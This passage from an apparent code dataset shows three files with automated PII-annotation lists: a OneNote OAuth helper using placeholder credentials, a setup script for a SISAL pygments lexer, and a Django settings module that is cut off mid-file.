['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instances.sh'], ['URL', 'instance.id'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', 'instance.state.sh'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', '.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.re'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.re'], ['URL', 'instance.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'm1.sm'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'data.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], 
['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group.id'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.in'], ['URL', 'type.sh'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'cidr.should.co'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.mo'], ['URL', 'client.ru'], ['URL', 'instance.should.co'], ['URL', 'instance.should.co'], ['URL', '.should.be.gr'], ['URL', '.should.be.gr'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'subnet.id'], ['URL', 'group1.na'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', '.id.sh'], ['URL', 'eni.id'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'instance.groups.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group1.id'], ['URL', 'boto.ec2.net'], ['URL', 'eni.id'], ['URL', 'conn.ru'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group1.id'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group2.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 
'eni.attachment.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidAttachmentID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'address.sh'], ['URL', 'name.should.co'], ['URL', 'address.re'], ['URL', 'instance.pr'], ['URL', 'address.sh'], ['URL', 'instance.pr'], ['URL', 'name.should.co'], ['URL', 'instance.pr'], ['URL', 'address.re'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ke'], ['URL', 'name.sh'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'volume.cr'], ['URL', 'snapshot.sn'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'snapshot.sn'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'status.status.sh'], ['URL', 'status.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', '.id.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.de'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.st'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'name.sh'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', 's.id'], ['URL', 'instance1.id'], ['URL', 'status1.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance2.id'], ['URL', 'status2.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance3.id'], ['URL', 'status3.st'], ['URL', 'name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'conn.cr'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'group.in'], ['URL', 'instance.id'], ['URL', 'boto3.re'], ['URL', 'client.cr'], ['URL', '.should.be'], ['URL', 'instance.mo'], ['URL', '.should.be'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'instance.mo'], ['URL', 'optimized.should.be'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', '.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 
'client.de'], ['URL', 'response.should.have.ke'], ['URL', 'response.should.have.ke'], ['URL', '.should.be'], ['URL', 'client.de'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.re'], ['URL', 'ec2.cr']]" +69,""""""" +PyOneNote.py +~~~~~~~~~~~~~~~~~ + +This module contains a basic OAuth 2 authentication helper and basic handlers for GET and POST operations. +This work was just a quick hack to migrate notes from an old database to OneNote, but it should help you to understand +the request structure of OneNote. + +Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license. +See LICENSE in the project root for license information. +"""""" + +import requests + + +class OAuth(): + """"""Handles the authentication for all requests"""""" + + def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None): + """""" This information is obtained upon registration of a new Outlook Application. + The values below are just examples and are not valid + :param client_id: ""cda3ffaa-2345-a122-3454-adadc556e7bf"" + :param client_secret: ""AABfsafd6Q5d1VZmJQNsdac"" + :param code: = ""PI:KEY"" + :param token: = ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......"" + :param rtoken: = ""MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......"" """""" + self.client_id = client_id + self.client_secret = client_secret + self.code = code + self.token = token + self.rtoken = refresh_token + self.redirect_uri = 'https://localhost' + self.session = requests.Session() + + @staticmethod + def get_authorize_url(client_id): + ""Open this url in a browser to let the user grant access to OneNote. Extract your access code from the return URL."" + url = ""https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format( + client_id) + return url + + def get_token(self): + """""" + Make the following request with e.g. postman: + POST https://login.live.com/oauth20_token.srf + Content-Type:application/x-www-form-urlencoded + + grant_type:authorization_code + client_id:cda3ffaa-2345-a122-3454-adadc556e7bf + client_secret:AABfsafd6Q5d1VZmJQNsdac + code:111111111-1111-1111-1111-111111111111 + redirect_uri:https://localhost + + OneNote will return as result: + { + ""token_type"": ""bearer"", + ""expires_in"": 3600, + ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"", + ""access_token"": ""AxxdWR1DBAAUGCCXc8wU/...."", + ""refresh_token"": ""DR3DDEQJPCiM2aACbIYa...."", + ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"" + } + """""" + raise NotImplementedError("""") + + def refresh_token(self): + """""" + Make the following request to refresh your token with e.g. postman: + POST https://login.live.com/oauth20_token.srf + Content-Type:application/x-www-form-urlencoded + + grant_type:refresh_token + client_id:cda3ffaa-2345-a122-3454-adadc556e7bf + client_secret:AABfsafd6Q5d1VZmJQNsdac + refresh_token:DR3DDEQJPCiM2aACbIYa.... 
+ redirect_uri:https://localhost + --> + { + ""token_type"": ""bearer"", + ""expires_in"": 3600, + ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"", + ""access_token"": ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW..."", + ""refresh_token"": ""DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss..."", + ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"" + } + """""" + url = 'https://login.live.com/oauth20_token.srf' + headers = {""Content-Type"": ""application/x-www-form-urlencoded""} + data = {""grant_type"": ""refresh_token"", + ""client_id"": self.client_id, + ""client_secret"": self.client_secret, + ""refresh_token"": self.rtoken, + ""redirect_uri"": self.redirect_uri} + + result = self.session.post(url, headers=headers, data=data) + + print(""Refreshed token: "" + result.text) + refresh = result.json() + self.expire = refresh.get('expires_in') + self.token = refresh.get('access_token') + self.rtoken = refresh.get('refresh_token') + print(""Token: "" + self.token) + print(""Refresh Token: "" + self.rtoken) + return True + + def _get(self, url, query): + """"""Handles GET Request with Authentication"""""" + headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token} + result = self.session.get(url, headers=headers, params=query) + print(""GET "" + result.url) + print(result.headers) + if (result.text): + print(result.text) + return result + + def _post(self, url: str, headers: list, data: str = None, files: list = None): + """"""Handles POST Request with Authentication"""""" + newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token} + if data: + newHeaders.update(headers) + result = self.session.post(url, headers=newHeaders, data=data) + else: + result = self.session.post(url, headers=newHeaders, files=files) + # result.request.headers + print(""POST "" + result.url) + print(result.headers) + if (result.text): + print(result.text) + return result + + def post(self, url: str, headers: list, data: str = None, files: list = None): + """"""post something and handle token expire transparent to the caller"""""" + try: + result = self._post(url, headers, data=data, files=files) + if (result.status_code not in (200, 201)): + print(""Error: "" + str(result.status_code)) + if (result.status_code == 401): + print(""Refreshing token"") + if self.refresh_token(): + result = self._post(url, headers, data, files=files) + else: + print('Failed retry refreshing token') + return result + except Exception as e: + print(e) + pass + + def get(self, url, query, headers=None): + """"""get something and handle token expire transparent to the caller"""""" + try: + result = self._get(url, query) + if (result.status_code != requests.codes.ok): + print(""Error: "" + str(result.status_code)) + if (result.status_code == 401): + print(""Refreshing token"") + if self.refresh_token(): + result = self._get(url, query) + else: + print('Failed retry refreshing token') + return result + except Exception as e: + print(e) + pass + + def get_credentials(self): + """"""Return the actual credentials of this OAuth Instance + :return client_id:"""""" + return self.client_id, self.client_secret, self.code, self.token, self.rtoken + + +class OneNote(OAuth): + """"""This class wraps some OneNote specific calls"""""" + def __init__(self, client_id, client_secret, code, token, rtoken): + super().__init__(client_id, client_secret, code, token, rtoken) + self.base = ""https://www.onenote.com/api/v1.0/me/"" + + def list_notebooks(self): + url = 
self.base + ""notes/notebooks"" + query = {'top': '5'} + result = self.get(url, query) + n = None + if (result): + notebooks = result.json() + # result_serialized = json.dumps(result.text) + # notebook = json.loads(result_serialized) + n = notebooks[""value""][0] + x = 1 + return n + + def post_page(self, section_id: str, created, title: str, content: str, files: list = None): + """"""post a page. If you want to provide additional images to the page provide them as file list + in the same way like posting multipart message in 'requests' + .:param content: valid html text with Umlaute converted to ä"""""" + url = self.base + ""notes/sections/"" + section_id + ""/pages"" + headers = {""Content-Type"": ""application/xhtml+xml""} + # the basic layout of a page is always same + data = """""" + + + {0} + + + +
    + {2} +
    + + +"""""".format(title, created, content) + result = None + if files: + ""post as multipart"" + newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))] + newFiles.extend(files) + result = self.post(url, {}, None, files=newFiles) + else: + ""post as simple request"" + result = self.post(url, headers, data) + n = None + if (result): + notebooks = result.json() + # result_serialized = json.dumps(result.text) + # notebook = json.loads(result_serialized) + # n = notebooks[""value""][0] + x = 1 + return notebooks +",9316,"[['URL', 'https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format'], ['URL', ""https://login.live.com/oauth20_token.srf'""], ['DATE_TIME', '2016'], ['PERSON', 'self.rtoken ='], ['PERSON', 'self.rtoken'], ['URL', 'self.se'], ['PERSON', 'self.rtoken'], ['URL', 'self.session.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'requests.co'], ['LOCATION', 'self.base'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'self.ge'], ['PERSON', 'Umlaute'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://www.onenote.com/api/v1.0/me/""'], ['URL', 'PyOneNote.py'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.red'], ['URL', 'self.se'], ['URL', 'requests.Se'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.red'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'refresh.ge'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'result.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.ba']]" +70,"""""""pygments-sisal module setup script for distribution."""""" + +from __future__ import with_statement + +import os +import setuptools + + +def get_version(filename): + with open(filename) as fh: + for line in fh: + if line.startswith('__version__'): + return line.split('=')[-1].strip()[1:-1] + + +setuptools.setup( + name='pygments-sisal', + version=get_version(os.path.join('pygments_sisal', '__init__.py')), + author='Alexander Asp Bock', + dummy@email.com', + platforms='All', + description=('A pygments lexer for SISAL'), + install_requires=['Pygments>=2.0'], + license='MIT', + keywords='pygments, lexer, sisal', + url='https://github.com/MisanthropicBit/pygments-sisal', + packages=setuptools.find_packages(), + long_description=open('README.md').read(), + classifiers=[ + 'Development Status :: 5 - Production/Stable', + 'Intended Audience :: Developers', + 'Topic :: Utilities', + 'License :: OSI Approved :: MIT License', + 'Programming Language :: Python :: 2.6', + 'Programming Language :: Python :: 2.7', + 'Programming Language :: Python :: 3', + 'Programming Language :: Python :: 3.2', + 'Programming Language :: Python :: 3.3', + 'Programming Language :: Python :: 3.4', + 'Programming Language :: Python :: 3.5' + ], + # Pygments entry point + entry_points=""[pygments.lexers]\n"" + ""sisal=pygments_sisal:SisalLexer"" +) +",1467,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""Asp Bock'""], ['URL', 
""https://github.com/MisanthropicBit/pygments-sisal',""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'line.st'], ['URL', 'setuptools.se'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'setuptools.fi'], ['URL', 'README.md']]" +71,"# -*- coding: utf-8 -*- +"""""" +Django settings for saefacto project. + +For more information on this file, see +https://docs.djangoproject.com/en/dev/topics/settings/ + +For the full list of settings and their values, see +https://docs.djangoproject.com/en/dev/ref/settings/ +"""""" + +# Build paths inside the project like this: os.path.join(BASE_DIR, ...) +import os +from os.path import join + +# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings +try: + from S3 import CallingFormat + AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN +except ImportError: + # TODO: Fix this where even if in Dev this class is called. + pass + +from configurations import Configuration, values + +BASE_DIR = os.path.dirname(os.path.dirname(__file__)) + + +class Common(Configuration): + + ########## APP CONFIGURATION + DJANGO_APPS = ( + # Default Django apps: + 'django.contrib.auth', + 'django.contrib.contenttypes', + 'django.contrib.sessions', + 'django.contrib.sites', + 'django.contrib.messages', + 'django.contrib.staticfiles', + + # Useful template tags: + # 'django.contrib.humanize', + # 'suit', + # Admin + 'django.contrib.admin', + 'django.contrib.admindocs', + ) + THIRD_PARTY_APPS = ( + 'south', # Database migration helpers: + 'crispy_forms', # Form layouts + 'avatar', # for user avatars + 'sitetree', + 'sitetree_smartadmin', + 'django_user_agents', + 'statici18n', # javascript + 'parsley', + + ) + + # Apps specific for this project go here. + LOCAL_APPS = ( + 'users', # custom users app + 'core', + 'main', + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps + INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS + + INSTALLED_APPS += ( + # Needs to come last for now because of a weird edge case between + # South and allauth + 'allauth', # registration + 'allauth.account', # registration + 'allauth.socialaccount', # registration + ) + ########## END APP CONFIGURATION + + ########## MIDDLEWARE CONFIGURATION + MIDDLEWARE_CLASSES = ( + 'django.contrib.sessions.middleware.SessionMiddleware', + 'django.middleware.common.CommonMiddleware', + 'django.middleware.csrf.CsrfViewMiddleware', + 'django.contrib.auth.middleware.AuthenticationMiddleware', + 'django.contrib.messages.middleware.MessageMiddleware', + 'django.middleware.clickjacking.XFrameOptionsMiddleware', + 'django_user_agents.middleware.UserAgentMiddleware', + ) + ########## END MIDDLEWARE CONFIGURATION + + ########## DEBUG + # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug + DEBUG = values.BooleanValue(False) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + + ########## SECRET CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key + # Note: This key only used for development and testing. 
+ # In production, this is changed to a values.SecretValue() setting + SECRET_KEY = ""CHANGEME!!!"" + ########## END SECRET CONFIGURATION + + ########## FIXTURE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS + FIXTURE_DIRS = ( + join(BASE_DIR, 'fixtures'), + ) + ########## END FIXTURE CONFIGURATION + + ########## EMAIL CONFIGURATION + EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend') + ########## END EMAIL CONFIGURATION + + ########## MANAGER CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins + ADMINS = ( + ('Fábio C. Barrionuevo da Luz', dummy@email.com'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers + MANAGERS = ADMINS + ########## END MANAGER CONFIGURATION + + ########## DATABASE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases + DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto') + ########## END DATABASE CONFIGURATION + + ########## CACHING + # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows. + # memcacheify is what's used in Production + CACHES = { + 'default': { + 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', + 'LOCATION': '' + } + } + ########## END CACHING + + ########## GENERAL CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone + TIME_ZONE = 'America/Araguaina' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code + LANGUAGE_CODE = 'pt-br' + LANGUAGES = ( + ('pt-br', u'Português do Brasil'), + ('en', 'English'), + ('es', u'Español'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id + SITE_ID = 1 + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n + USE_I18N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n + USE_L10N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz + USE_TZ = True + ########## END GENERAL CONFIGURATION + + ########## TEMPLATE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors + TEMPLATE_CONTEXT_PROCESSORS = ( + 'django.contrib.auth.context_processors.auth', + ""allauth.account.context_processors.account"", + ""allauth.socialaccount.context_processors.socialaccount"", + 'django.core.context_processors.debug', + 'django.core.context_processors.i18n', + 'django.core.context_processors.media', + 'django.core.context_processors.static', + 'django.core.context_processors.tz', + 'django.contrib.messages.context_processors.messages', + 'django.core.context_processors.request', + # Your stuff: custom template context processers go here + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs + TEMPLATE_DIRS = ( + join(BASE_DIR, 'templates'), + ) + + TEMPLATE_LOADERS = ( + 'django.template.loaders.filesystem.Loader', + 'django.template.loaders.app_directories.Loader', + ) + + # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs + CRISPY_TEMPLATE_PACK = 'bootstrap3' + ########## END TEMPLATE CONFIGURATION + + ########## STATIC FILE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root + STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url + STATIC_URL = '/static/' + + # See: 
https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS + STATICFILES_DIRS = ( + join(BASE_DIR, 'static'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders + STATICFILES_FINDERS = ( + 'django.contrib.staticfiles.finders.FileSystemFinder', + 'django.contrib.staticfiles.finders.AppDirectoriesFinder', + ) + ########## END STATIC FILE CONFIGURATION + + ########## MEDIA CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root + MEDIA_ROOT = join(BASE_DIR, 'media') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url + MEDIA_URL = '/media/' + ########## END MEDIA CONFIGURATION + + ########## URL Configuration + ROOT_URLCONF = 'config.urls' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application + WSGI_APPLICATION = 'config.wsgi.application' + ########## End URL Configuration + + ########## AUTHENTICATION CONFIGURATION + AUTHENTICATION_BACKENDS = ( + 